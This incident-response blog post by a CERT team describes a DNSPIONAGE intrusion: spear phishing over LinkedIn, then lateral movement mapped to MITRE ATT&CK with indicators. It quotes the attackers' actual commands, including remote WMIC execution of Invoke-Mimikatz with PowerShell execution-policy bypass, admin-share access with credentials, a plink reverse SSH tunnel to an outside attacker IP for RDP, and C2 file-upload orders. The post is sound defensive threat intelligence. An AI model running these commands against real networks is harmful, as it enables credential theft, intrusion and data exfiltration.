Recently, we had an incident response involving the malware DNSPIONAGE.
At CERT-OPMD, we thought it would be interesting to share our observations.
Mainly, we could observe quietly common actions and tools as described in infography below.
HOW DNSPIONAGE INFECTS TARGETS
In this blogpost, we will not describe and analyse again the dropper, because Talos did a great job here : https://blog.talosintelligence.com/2018/11/dnspionage-campaign-targets-middle-east.html
But we will focus in a way on what they could not have seen with their telemetry, and what we could have seen during our investigation.
The screenshot above is what we are talking about here.
Talos observed two domains during the analysis :
And they did obtained the “Suncor” dropper.
During investigation we were targeted by Wipro document (cf. screenshot below):
Some Google reverted search on image, shows us where the attackers get this image below (spoiler: on legit wipro.com website, see screenshot below).
Ok, so now we are aware that they wanted to do some really advanced spear phishing.
During our investigation, we had the chance to speak with very comprehensive users, who remembered weird things that happened to them.
He remembered he was speaking with a HR from Wipro on linkedin for few days before the attack.
We hid the identity of the linkedin account because we are assuming it’s a real person behind it, whom may have it’s account stolen.
“Hopefully”, the users infected were technical IT guys, so it was easy to be understood by them while talking about “phishing”, “spear phishing via social media”, etc.
We hope these datas will help you to understand how DNSPIONAGE infects people
TOOLS USED BY DNSPIONAGE TO PERFORM INTERNAL ACTIONS
INTERNAL ACTIONS OBSERVED
Now, we will describe the lateral movement we observed during the Incident Response.
We observed some very “usual” phases in this case : a preparation phase to perform the whole attack (domain registration, and so on), a delivery phase (with social engineering through professional social media), an installation and a C&C phase (where the malware is dropped, and the macro used for dropping creates a scheduled task).
Then we observed the adversaries performing directory listing through batch files:
- dir /s /a C:\ 2>&1 (from C: to Z:)
These results were exfiltrated through HTTP to the C&C, to perform some analysis. Because the actions we observed next are file copying and specific files exfiltrations, like a file containing the backup’s configuration. We assumed it was used then to map the network “passively”.
After having the hostnames informations, adversaries performed some discovery using microsoft tools, including network discovery, software discovery, shares discovery,etc. :
- wmic logicaldisk get name
- net group \ »domain admins\ » /domain
- ping -n 1 -a IP
- net use \\\\HOSTNAME\\c$ /user:\ »DOMAIN\\USERNAME\ » \ »PASSWORD\ » 2>&1
- WMIC /Node:localhost /Namespace:\\\\root\\SecurityCenter Path AntiVirusProduct Get /Format:List | more | findstr displayName 2>&1
- wmic /node:\ »HOSTNAME\ » process call create \« cmd /c powershell -exec bypass import-module c:\\users\\public\\new.ps1;invoke-mimikatz
With all the informations gathered, adversaries could perform some precise lateral movement on critical servers, by installing a putty to make a SSH tunnel in order to perform RDP remotely.
- echo y | .\\downloads\\plink32.exe 188.8.131.52 -P 443 -C -R 0.0.0.0:12456:HOSTNAME:3389 -l <login> -pw <password>
The schema below is here for helping understand DNSPIONAGE’s process in network.
- Mimikatz : Mimikatz is a credential dumper capable of obtaining plaintext Windows account logins and passwords, along with many other features that make it useful for testing the security of networks.
- Off-the-shelf administration software
- Bitvise WinSSHD : Bitvise WinSSH is an easy-to-use SSH server which includes Secure remote access via console (vt100, xterm and bvterm supported), Secure remote access via GUI (Remote Desktop or WinVNC required).
- Open source Hacking tools : (https://github.com/Veil-Framework/Veil-Pillage/blob/master/data/PowerSploit/Invoke-Mimikatz.ps1)
- Custom malware : DNSPIONAGE
- Putty : to open SSH tunnel in order to gain RDP access on internal assets
ATT&CK MATRIX MAPPING
In order to understand the entire behavior of the attackers, from the initial access to data exfiltration, we created a matrix to reconstruct the entire TTP of the attackers.
We based our matrix on Mitres’s work ; MITRE ATT&CK™ is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. So we cut out all the phases of the actions taken by the attackers, so any analysts or researchers could understand and remedy this situation if they came to meet her.
|MITRE ATT&CK phases||Technics||IOC||Comments||Observations|
|Spearphishing via Service
|https://fr[.]linkedin[.]com/in/XXXXXXXXXX||HR consultant spoke with targets for weeks thourgh linkedin before delivering spearphishing link|
|Windows Management Instrumentation
|wmic /node:\ »USER\ » /user:\ »DOMAIN\\USERNAME\ » /password:PASSWORD process call create \ »cmd /c echoy y | .\\Downloads\\plink32.exe 184.108.40.206 -P 443 -C -R 0.0.0.0:12456:HOSTNAME:3389 -l <login>-pw <password>\ »||Command Failed but was used three times|
|Downloads\\bat_file_46583.bat||Using custom batch files to script actions (script directory listing, script copy of ps1 tools to many other assets) Example next case||C:\\Users\\USERNAME\\.oracleServices>CHCP 65001 \r\n\r\nC:\\Users\\USERNAME\\.oracleServices>copy .\\Downloads\\new.ps1 \\\\HOSTNAME\\c$\\users\\public\\ 2>&1 \r\n 1 file(s) copied.\r\n\r\nC:\\Users\\USERNAME\\.oracleServices>copy .\\Downloads\\new.ps1 \\\\HOSTNAME\\c$\\users\\public\\ 2>&1 \r\n 1 file(s)|
|wmic /node:\ »HOSTNAME\ » process call create \ »cmd /c powershell -exec bypass import-module c:\\users\\public\\new.ps1;invoke-mimikatz||Using cmd to call powershell with « -exec bypass » args|
|wmic /node:\ »HOSTNAME\ » process call create \ »cmd /c powershell -exec bypass import-module c:\\users\\public\\new.ps1;invoke-mimikatz||Using powershell with « -exec bypass » args to launch mimikatz|
|Set service = CreateObject (schedule.service)
regInfo.Description = « chromium updater v 37.5.0 »
regInfo.Author = « Google Inc. »
|Observed in dropper’s macro|
|Defense Evasion||File Deletion
|del .\\Downloads\\bat_file_46583.bat||After using a custom .bat downloaded from C2, attackers deleted it immediately|
|Credential Access||Credential Dumping
|sekurlsa::logonpasswords||Includes Script from https://github.com/Veil-Framework/Veil-Pillage/blob/master/data/PowerSploit/Invoke-Mimikatz.ps1||Mimikatz Version : mimikatz 2.0 alpha (x64) release \ »Kiwi en C\ » (Feb 16 2015 22:15:28)|
|System Information Discovery (T1082)||echo %username%, i : -4000, t : -1, k : 0 | hostname i : -5000, t : -1, k : 0 | systeminfo | findstr /B /C:\ »Domain\ » i : -6000, t : -1, k : 0||Get detailed information about the the operating system|
|Permission Groups Discovery
|net group \ »domain admins\ » /domain|
|reg query \ »HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\||Get Remote Connection details from user|
|File and Directory Discovery
|dir /s /a C:\ 2>&1
dir \\\\HOSTNAME\\c$ 2>&1
|Use batchs scripts to perform directory discovery locally or remotely|
|Windows Admin Shares
|net use \\\\HOSTNAME\\c$ /user:\ »DOMAIN\\USERNAME\ » \ »PASSWORD\ » 2>&1||Try to remotely access to networked system|
|Remote System Discovery
|ping -n 1 -a IP||Try to know if IP is up|
|Security Software Discovery
|WMIC /Node:localhost /Namespace:\\\\root\\SecurityCenter Path AntiVirusProduct Get /Format:List | more | findstr displayName 2>&1||Adversaries attempt to get a listing of security softwares|
|System Network Configuration Discovery
|ipconfig /all||Get detailed of network configuration from host|
|System Information Discovery
|wmic logicaldisk get name||List all logical and physical drives|
|Remote Desktop Protocol
|echo y | .\\downloads\\plink32.exe 220.127.116.11 -P 443 -C -R 0.0.0.0:12456:HOSTNAME:3389 -l <login> -pw <password>||Using plink32 to open an SSH tunnel to perform remote RDP|
|Remote File Copy
|copy .\\Downloads\\new.ps1 \\\\HOSTNAME\\c$\\users\\public\\ 2>&1||Using remote copy to push files used for lateral movement,like new.ps1 (mimikatz)|
|Collection||Data from Local System
|« ull »: « /Client/Upload »,
« dl »: ,
« ul »: [« d:\\mRemoteNG-IMFO\\confCons.xml »]
|Exfiltration||Exfiltration Over Command and Control Channel
|« ull »: « /Client/Upload »,
[Message] uploading files form
|In log.txt we can observe the json orders, including the « Upload » orders and Upload URL|
Command and control
|Commonly Used Port
|Port 80 HTTP for C2
Port 443 for SSH Tunnel
|Standard Application Layer Protocol
|[Message] send command result dns length:63
|Base32 to encode DNS messages|
|[Message] config file found!
[Message] current directory set to C:\Users\USERNAME\.oracleServices\
[Message] entering normal mode[Message] get command with dns
|Malware can change mode into HTTP mode or DNS mode to exfiltrate datas|
|Remote File Copy
|« dl »: [« /Client/Download/LXqaYRoxoPYNOwjfDadLJAExtjgZYBunvJFwoEohVXJvK »],||Malware downloaded batchs scripts or ps1 scripts to perform actions.|
INFRASTRUCTURE IN USE DURING INVESTIGATION
GLOBAL OVERVIEW – DNS & IP PUBLICLY OBSERVABLE
During the investigation we were able to trace a number of IP addresses used by the attackers. We find both the IP that hosted the C2, the IP that served for the RDP connection, and so on :
|18.104.22.168||Used for RDP|
|22.214.171.124||HTTP Server for C2|
By performing some passive DNS resolution from hr-wipro[.]com (the dropper delivery domain) and hr-suncor[.]com (observed by Talos) we could observe the following domains/IP :
INFRASTRUCTURES USED FOR LATERAL MOVEMENT
After compromising the first victim, the main goal of the attackers is to perform some lateral movement in order to have better access to more sensitive datas and/or assets :
- They first tried to use mimikatz remotely on several servers (which triggered our SOC alert). “Hopefully” it seems they only used sekurlsa::logonpassword and they did not create some golden or silver tickets.
- Mimikatz was not really efficient, but they could already execute some arbitrary code remotely.
- So they decided to copy plink32.exe – a putty like – on several assets. (sha256sum:3984ae8dd6df1196211232eb56393a4ce3a330508c5862c38ea3b8faf8048072)
- Execute plink32.exe to create a tunnel in order to perform remote RDP on assets. (echo y | .\\downloads\\plink32.exe 126.96.36.199 -P 443 -C -R 0.0.0.0:12456:HOSTNAME:3389 -l <login> -pw <password>)
- By using RDP, it was easier for them to access to databases servers and to identify other critical asset
We were very lucky during the investigation : the attackers performed a lot of errors that helped us to investigate easily, and to give us some very precise indicators on how they perform the requests.
So, we hope this article will help you investigating internally if you may have been targeted by DNSPIONAGE.